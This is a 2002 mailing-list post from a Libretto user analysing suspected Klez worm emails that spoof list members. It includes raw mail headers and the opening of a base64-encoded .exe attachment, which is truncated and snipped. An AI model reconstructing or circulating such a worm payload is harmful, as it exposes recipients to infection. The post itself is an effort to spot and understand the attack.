Date: Fri, 26 Jul 2002 00:16:57 +0000 From: "Matthew Hanson" <[EMAIL PROTECTED]> Subject: A powful tool
I wonder how many other people on the list are getting these emails. It would be interesting if someone who HAS posted to the list in the past few months, HASN'T received one of these emails. Today I get yet another probable virus attack. This time it's supposedly from David Chien. The return address is "adorablelibretto <[EMAIL PROTECTED]>" which is a pretty close variant to "David Chien <[EMAIL PROTECTED]>" he uses to post here. The subject looks familiar, but with a couple typos: "A powful tool" If it is a virus, I'm guessing it's specifically making the typos in the subject to appear more 'believable'. Though posted through the same Israeli ISP netvision.net.il, it seems to have originated from Sctrsrvc ([62.0.147.50]): Received: from Sctrsrvc ([62.0.147.50]) by mxout2.netvision.net.il Yesterday's originated from Arop ([62.0.150.217]): Received: from Arop ([62.0.150.217]) by mxout3.netvision.net.il Doing quick research into IP and DNS addresses, it would seem that "Sctrsrvc" probably represents the user name of the email account, and ([62.0.147.50]) most likely a dynamic IP address that person was given when logged into the netvision.net.il server. Does that sound right? The attachment here is StartStatis[1].exe, and the two from the previous post were Jfcaq.scr leshonit[1].jpg. From what I've read, certain Kelz variants create random file names when they re-send the virus. It's interesting that Hotmail does not indicate there are any attachments to these emails. But I found info on a Klez variant specifically targeted at Outlook (surprise, surprise!) that doesn't display attachments in some mail readers other than Outlook. But from what Pres says, and from what I've been reading... Klez gets it's email addresses from address books. Is it likely that Pres's, David's, and my email address are in someone's address book who has an internet account in this Israeli ISP? Info from this site may explain: http://membrane.com/security/computer_viruses/viri_and_email_harvesting.html It would seem that code from SPAM email address harvesting software has been combined with new virus software to gather email addresses from browser caches and websites. So it could very well be that Dan's and the new searchable archive websites (Mike's isn't registered, and doesn't come up in any searches I've done) have been harvested. And perhaps members with the most posts are selected as phony senders of the virus to the rest of the list. It would be interesting if someone who HAS posted to the list in the past few months, HASN'T received one of these emails. M(S) (Not necessarily paranoid, just very curious and cautious) PS: Wonder if it�s just coincidence that viruses seem to be appearing in increasingly larger numbers since the events at the WTC. ASCII source with HTML (hopefully) disabled this time: ---------------------------------------------------------- Received: from mxout2.netvision.net.il ([194.90.9.21]) by mc2-f15.law16.hotmail.com with Microsoft SMTPSVC(5.0.2195.4905); Thu, 25 Jul 2002 04:08:27 -0700 Received: from Sctrsrvc ([62.0.147.50]) by mxout2.netvision.net.il (iPlanet Messaging Server 5.2 HotFix 0.8 (built Jul 12 2002)) with SMTP id <[EMAIL PROTECTED]> for [EMAIL PROTECTED]; Thu, 25 Jul 2002 14:08:18 +0300 (IDT) Date: Thu, 25 Jul 2002 14:07:51 +0300 (IDT) Date-warning: Date header was inserted by mxout2.netvision.net.il From: adorablelibretto <[EMAIL PROTECTED]> Subject: A powful tool To: [EMAIL PROTECTED] Message-id: <[EMAIL PROTECTED]> MIME-version: 1.0 Content-type: multipart/alternative; boundary="Boundary_(ID_ZSYUym9rAolQX13Ma7pqrA)" Return-Path: [EMAIL PROTECTED] X-OriginalArrivalTime: 25 Jul 2002 11:08:27.0586 (UTC) FILETIME=[9A0F3220:01C233CB] --Boundary_(ID_ZSYUym9rAolQX13Ma7pqrA) Content-type: text/html Content-transfer-encoding: 7BIT <.HTML><.HEAD><./HEAD><.BODY> <.FONT>This is a powful tool<.br> I hope you would like it.<./FONT><./BODY><./HTML> --Boundary_(ID_ZSYUym9rAolQX13Ma7pqrA) Content-id: <Rw331Ge5F0KJ> Content-type: application/octet-stream; name="StartStatis[1].exe" Content-transfer-encoding: base64 Content-disposition: attachment; filename="StartStatis[1].exe" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA .....<snip>..... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=9 --Boundary_(ID_ZSYUym9rAolQX13Ma7pqrA)-- _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx ************************************************************** http://libretto.basiclink.com - Libretto mailing list http://www.silverace.com/libretto/ - Archives -------TO UNSUBSCRIBE------- Reply to any of the list messages. The reply mail should be addressed to: [EMAIL PROTECTED] - Then replace any text on the message's subject line: cmd:unsubscribe --------TO UNSUBSCRIBE DIGEST------ Do above but with this on subject line: cmd:unsubscribe digest **************************************************************
